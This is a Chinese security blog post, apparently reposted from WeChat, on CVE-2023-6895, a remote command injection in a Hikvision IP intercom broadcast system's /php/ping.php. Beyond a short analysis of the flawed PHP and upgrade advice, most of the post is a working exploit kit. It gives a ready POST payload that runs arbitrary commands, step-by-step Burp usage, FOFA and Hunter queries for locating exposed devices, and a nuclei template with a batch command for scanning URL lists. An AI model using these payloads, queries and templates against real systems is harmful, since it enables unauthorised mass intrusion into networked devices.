漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895

admin
admin
admin
131479
文章
107
评论
2024年1月10日12:25:33评论32 views字数 3178阅读10分35秒阅读模式
漏洞详情:

海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。

影响范围

v3.0.3_20201113_RELEASE(HIK)

资产测绘

fofa:icon_hash="-1830859634"鹰图:web.icon=="e854b2eaa9e4685a95d8052d5e3165bc"
漏洞所在代码:

header("Content-type: text/html; charset=GB2312");$postData = $_POST['jsondata'];if(isset($postData['ip']) && isset($postData['type'])){     $type = $postData['type'];//类型     $ip = $postData['ip'];//IP地址     $arr = systemopr($type, $ip);     $len = count($arr);     for($i = 0; $i < $len; $i++){          if(isset($arr[$i])){               $arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8          }     }     $after = json_encode($arr);//转换成json     echo $after;}function systemopr($type, $ip, $times=4){     $info = array();          if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){           //linux           if($type == "0"){               exec("ping -c $times $ip", $info);           }else if($type == "1"){               exec("traceroute -m $times -w 1 $ip", $info);           }else{               exec($ip, $info);          }     }else{          //windows          if($type == "0"){               exec("ping $ip -n $times", $info);          }else if($type == "1"){               exec("tracert -h $times -w 1000 $ip", $info);          }else{               exec($ip, $info);          }     }     return $info;}

可以看到问题在systemopr(),发现当$postData['type']和$postData['ip']存在值时,则会传入systemopr函数,通过exec()函数进行拼接命令执行,当$postData['type']等于0或1时,则代入指定代码段,执行指定命令。但$postData['type']参数值不等于0和1时,可以不考虑参数闭合,直接可以通过$postData['ip']执行任意命令。而且恰巧$postData['type']和$postData['ip']的值都是POST传参可控的,导致我们可以执行任意系统命令。

漏洞利用

pocPOST /php/ping.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 45Origin: Connection: closeReferer: http://xxx.xxx.xxx/html/system.htmlX-Forwarded-For: jsondata[type]=3&jsondata[ip]=ipconfig
使用方法:

1、使用浏览器访问目标系统,并使用BurpSuite进行拦截抓包或hackbar等;

漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
2、拦截的GET请求包转换成POST包,并添加/php/ping.php地址,请求内容为:jsondata[type]=99&jsondata[ip]=ipconfig 其他内容不修改

漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
3、Unicode编码转换

http://www.kuquidc.com/convert/Unicode.php
漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
漏洞修复建议

升级到4.1.0版本

目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://www.spon.com.cn/

nuclei poc
id: CVE-2023-6895info:  name: 海康威视IP网络对讲广播系统远程命令执行漏洞  author: fgz  severity: critical  description: 海康威视IP网络对讲广播系统,采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。它解决了传统对讲广播系统存在的传输距离有限、易受干扰等问题。海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE的/php/ping.php接口存在RCE漏洞。攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。  metadata:    max-request: 1    fofa-query: icon_hash="-1830859634"    verified: truerequests:  - raw:      - |+        POST /php/ping.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0        Accept: application/json, text/javascript, */*; q=0.01        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Content-Type: application/x-www-form-urlencoded        X-Requested-With: XMLHttpRequest        Connection: close        jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'IP')"
批量使用方法

nuclei -t CVE-2023-6895.yaml -l url.txt
漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。

原文始发于微信公众号(不秃头的安全):漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月10日12:25:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞情报-海x威视IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895https://cn-sec.com/archives/2380761.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息